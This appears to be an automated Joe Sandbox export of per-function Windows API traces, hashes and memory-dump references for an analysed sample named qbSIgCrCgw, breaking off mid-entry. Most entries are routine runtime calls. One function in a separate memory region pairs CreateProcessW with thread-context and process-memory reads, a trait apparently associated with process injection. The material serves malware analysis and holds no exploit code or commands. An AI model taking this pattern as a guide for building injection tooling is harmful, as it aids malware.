• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
                                                                                • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                • Instruction ID: 59d07ccf370bb9b29e9fac5bed691a52b9cb3d70c2932820e0a8b8b93fa9f67b
                                                                                • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                • Instruction Fuzzy Hash: 0EE0C2E220070153CA216538FE44EB353CC0F04312714080EB519EB242DF20EC4084A4
                                                                                APIs
                                                                                  • Part of subcall function 003B22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003B24F1), ref: 003B2303
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003B25A1
                                                                                • CoInitialize.OLE32(00000000), ref: 003B2618
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0042503A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 3815369404-0
                                                                                • Opcode ID: ec6f732b642b6b444941b96c4dbd6cfd3e26bff63df25b09f94092fffab79bf8
                                                                                • Instruction ID: dd54b4c0ab00f0e03b969d3bca561605e65d8053b026c0a901072ba58bb81204
                                                                                • Opcode Fuzzy Hash: ec6f732b642b6b444941b96c4dbd6cfd3e26bff63df25b09f94092fffab79bf8
                                                                                • Instruction Fuzzy Hash: 8F71E2B49113818BD305EF6EA992595BBA8F75834478082BFD50DEB772DB740884CF1D
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 003B3A73
                                                                                  • Part of subcall function 003D1405: __lock.LIBCMT ref: 003D140B
                                                                                  • Part of subcall function 003B3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003B3AF3
                                                                                  • Part of subcall function 003B3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003B3B08
                                                                                  • Part of subcall function 003B3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003B3AA3,?), ref: 003B3D45
                                                                                  • Part of subcall function 003B3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,003B3AA3,?), ref: 003B3D57
                                                                                  • Part of subcall function 003B3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00471148,00471130,?,?,?,?,003B3AA3,?), ref: 003B3DC8
                                                                                  • Part of subcall function 003B3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,003B3AA3,?), ref: 003B3E48
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003B3AB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                • String ID:
                                                                                • API String ID: 924797094-0
                                                                                • Opcode ID: 06ffab8feec977ccfd3e6e8517f2cae103c4ae699bf976ab1f8644ddba48dba3
                                                                                • Instruction ID: cffc8592f36da2925df6cc026d23843d2ac3ae2667973e5c3b74b81e58c48191
                                                                                • Opcode Fuzzy Hash: 06ffab8feec977ccfd3e6e8517f2cae103c4ae699bf976ab1f8644ddba48dba3
                                                                                • Instruction Fuzzy Hash: 8E1190719043919BC311EF29EC45A5ABBF8FB94710F00892FF588872B1DB709984CB96
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 003DEA29
                                                                                • __close_nolock.LIBCMT ref: 003DEA42
                                                                                  • Part of subcall function 003D7BDA: __getptd_noexit.LIBCMT ref: 003D7BDA
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                • String ID:
                                                                                • API String ID: 1046115767-0
                                                                                • Opcode ID: 3d3612a9529114618d1605070489214dd3a05792c8b0f544a4642e311930da6d
                                                                                • Instruction ID: e20abf0eccf4e08182960b5331b89e6fab21b29d6671b3170d39905389965537
                                                                                • Opcode Fuzzy Hash: 3d3612a9529114618d1605070489214dd3a05792c8b0f544a4642e311930da6d
                                                                                • Instruction Fuzzy Hash: AB11ACB3809A118ED313BB68F8423197E606F82331F260343E4345F3E2DBB88C4096A5
                                                                                APIs
                                                                                  • Part of subcall function 003D395C: __FF_MSGBANNER.LIBCMT ref: 003D3973
                                                                                  • Part of subcall function 003D395C: __NMSG_WRITE.LIBCMT ref: 003D397A
                                                                                  • Part of subcall function 003D395C: RtlAllocateHeap.NTDLL(00F30000,00000000,00000001,00000001,00000000,?,?,003CF507,?,0000000E), ref: 003D399F
                                                                                • std::exception::exception.LIBCMT ref: 003CF51E
                                                                                • __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                  • Part of subcall function 003D6805: RaiseException.KERNEL32(?,?,0000000E,00466A30,?,?,?,003CF538,0000000E,00466A30,?,00000001), ref: 003D6856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3902256705-0
                                                                                • Opcode ID: 44ac7b3476690f5f7aa9154e05e702adc6b7c227a2d1f60bf39c45319b3f896b
                                                                                • Instruction ID: e03dca00a71d2657d62342ce25e188907cc62891023a16d7bc6e9f04ecd0eeb2
                                                                                • Opcode Fuzzy Hash: 44ac7b3476690f5f7aa9154e05e702adc6b7c227a2d1f60bf39c45319b3f896b
                                                                                • Instruction Fuzzy Hash: 27F0C83250421D6BD706BF99FD02EEE77AD9F05364F60802BFA14D6281DBB0DA4097A9
                                                                                APIs
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • __lock_file.LIBCMT ref: 003D3629
                                                                                  • Part of subcall function 003D4E1C: __lock.LIBCMT ref: 003D4E3F
                                                                                • __fclose_nolock.LIBCMT ref: 003D3634
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2800547568-0
                                                                                • Opcode ID: 49c08599b20aacadf1b46f6e20a7cb677f62c881e48b289ba2fea0d67214d89c
                                                                                • Instruction ID: 1ad4e83ef95b651bf842279c1579dbede08c75499a96400f2731b7833c39a0b3
                                                                                • Opcode Fuzzy Hash: 49c08599b20aacadf1b46f6e20a7cb677f62c881e48b289ba2fea0d67214d89c
                                                                                • Instruction Fuzzy Hash: A2F0B473801614AAD7137B65A84276EBBA06F41730F26811BE460AF3C1CB7CCF059F96
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01008F4B
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01008FE1
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01009003
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                • Instruction ID: b80eed1f6c2b6175858db84523520468a3f3b2824cbbc6e0b6742988bd7d40ca
                                                                                • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                • Instruction Fuzzy Hash: 2E12BD24E14658C6EB24DF64D8507DEB272EF68300F10A0E9910DEB7A5E77A4E81CF5A
                                                                                APIs
                                                                                • __flush.LIBCMT ref: 003D2A0B
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __flush__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 4101623367-0
                                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction ID: c14a647d749842037dacf1e920b2e1507c98864a27955dfb704b2c605bf42d23
                                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction Fuzzy Hash: FB41D6727007069FDB2A8F69E89056FB7A6EF64360B25852FE845CB340EB70DD508B50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: d3d0f4039df99ec19dd54856991e57351533f9cdb6d1cf4f89cc00871f00cebb
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 7031E5B1A00105DFC71ADF58C498A69FBB6FF49340B6586A9E40ACB656DB30EDC1CB90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: aa62f0d45e422867c2f2db445daa8a2ab25044f6a4cd324535327704dca15d15
                                                                                • Instruction ID: 8e968072bfc60647fb3c4c305afa3de7c95bc0a676a2685310717eba3ff6d503
                                                                                • Opcode Fuzzy Hash: aa62f0d45e422867c2f2db445daa8a2ab25044f6a4cd324535327704dca15d15
                                                                                • Instruction Fuzzy Hash: CB4138706046518FDB25DF18C484F1ABBE0AF45308F1989ACE9968B762C376EC45DF42
                                                                                APIs
                                                                                  • Part of subcall function 003B4214: FreeLibrary.KERNEL32(00000000,?), ref: 003B4247
                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003B39FE,?,00000001), ref: 003B41DB
                                                                                  • Part of subcall function 003B4291: FreeLibrary.KERNEL32(00000000), ref: 003B42C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Free$Load
                                                                                • String ID:
                                                                                • API String ID: 2391024519-0
                                                                                • Opcode ID: 60213c9f0f6ce2668575f3e072a654c46a338d782d876f676bd629709b778e32
                                                                                • Instruction ID: afc47737da72232ff63cd11e7fa457dfed3b22a0c32546d79c120f488692b2a8
                                                                                • Opcode Fuzzy Hash: 60213c9f0f6ce2668575f3e072a654c46a338d782d876f676bd629709b778e32
                                                                                • Instruction Fuzzy Hash: 5F11EB31700315BADB16AB70DC06FEE77A99F40704F104829F656AE5C2DB74DA00AB68
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                • Opcode ID: c7f0764858382bd6b75d7d7b6e1aefb46f50b6f2c226bbdf623b99b470edbbe9
                                                                                • Instruction ID: 482fe62cf227dd6e36813e1b1de54a51da2831a641a1fc629d67bb6064170e94
                                                                                • Opcode Fuzzy Hash: c7f0764858382bd6b75d7d7b6e1aefb46f50b6f2c226bbdf623b99b470edbbe9
                                                                                • Instruction Fuzzy Hash: A0211570608641CFDB25DF68C444F2ABBE1BF85304F15896CEA968B622C732EC45DF52
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 003DAFC0
                                                                                  • Part of subcall function 003D7BDA: __getptd_noexit.LIBCMT ref: 003D7BDA
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                                • String ID:
                                                                                • API String ID: 1144279405-0
                                                                                • Opcode ID: 532b671557cf7d29a24618ff18de4eaeec0304c580fd4b0fde7360242d06e1bb
                                                                                • Instruction ID: ea086078806fb052e1511cd346a3f5c6719988c3c20142c7479000a87c1ba4be
                                                                                • Opcode Fuzzy Hash: 532b671557cf7d29a24618ff18de4eaeec0304c580fd4b0fde7360242d06e1bb
                                                                                • Instruction Fuzzy Hash: E6119DB38056009FD7136FA4B80275ABA60AF41331F274243E4744F3E2D7B589508BA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                • Instruction ID: 9c0de033a1321e7d7d3bca4e863fe585b9b1df434c8ecec6646fdbadc5b95dcf
                                                                                • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                • Instruction Fuzzy Hash: 4D01497150010DBFCF06EF64C9918FFBB78EF10344F508026B6659B596EA309A49DF64
                                                                                APIs
                                                                                • __lock_file.LIBCMT ref: 003D2AED
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2597487223-0
                                                                                • Opcode ID: e4afc2207f63f5acb4e2b0b488b24fc561fd5f4b3533ed4f0fa744f52582e786
                                                                                • Instruction ID: 3fff6078f0cbd909583d7baebeea2c8ca3969a93b9d528e7da5c357cad058284
                                                                                • Opcode Fuzzy Hash: e4afc2207f63f5acb4e2b0b488b24fc561fd5f4b3533ed4f0fa744f52582e786
                                                                                • Instruction Fuzzy Hash: 1CF06233A00205ABDF23AF65AC0679F76A5BF10310F164417F4249F391DB788A62DB51
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,003B39FE,?,00000001), ref: 003B4286
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: df15696d91f35a0aecfc107455ef12a1a735cd8f387ed54fbdd6514483e6f76a
                                                                                • Instruction ID: 71f3bf3e3bc34f3c4f99a79c924eef70392b50d962605cac31a0eb6a611589f2
                                                                                • Opcode Fuzzy Hash: df15696d91f35a0aecfc107455ef12a1a735cd8f387ed54fbdd6514483e6f76a
                                                                                • Instruction Fuzzy Hash: 6CF01C71505701CFCB369F64E490856B7F5AF053193258E3EF2D68AA11C7719840EB54
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B40C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID:
                                                                                • API String ID: 82841172-0
                                                                                • Opcode ID: c733f436bc38984369b6a7d6cddd529ca8b1abec4db284698e0d080a24f4eeaf
                                                                                • Instruction ID: 3922159fb537f6b98da15fdb2c9b34b5ef2abc85d48c8089d45dadacd5cf4026
                                                                                • Opcode Fuzzy Hash: c733f436bc38984369b6a7d6cddd529ca8b1abec4db284698e0d080a24f4eeaf
                                                                                • Instruction Fuzzy Hash: 6FE07D335001241BCB12A254DC42FEA339CDF88690F090171F905D7204D96499808690
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 010097A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: 632af1a37ec074ccedfe027155f1298dbd4ad9ccd32af30649876640bc0a1872
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: 7AE0BF7594010DEFDB01EFA8D5496DE7BB4FF04301F1045A5FD05D7681DB309E548A62
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 010097A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: a8fca6a8a8448fa8b12b1fa4ea65118805db52793f35cd48086f72182a980d45
                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
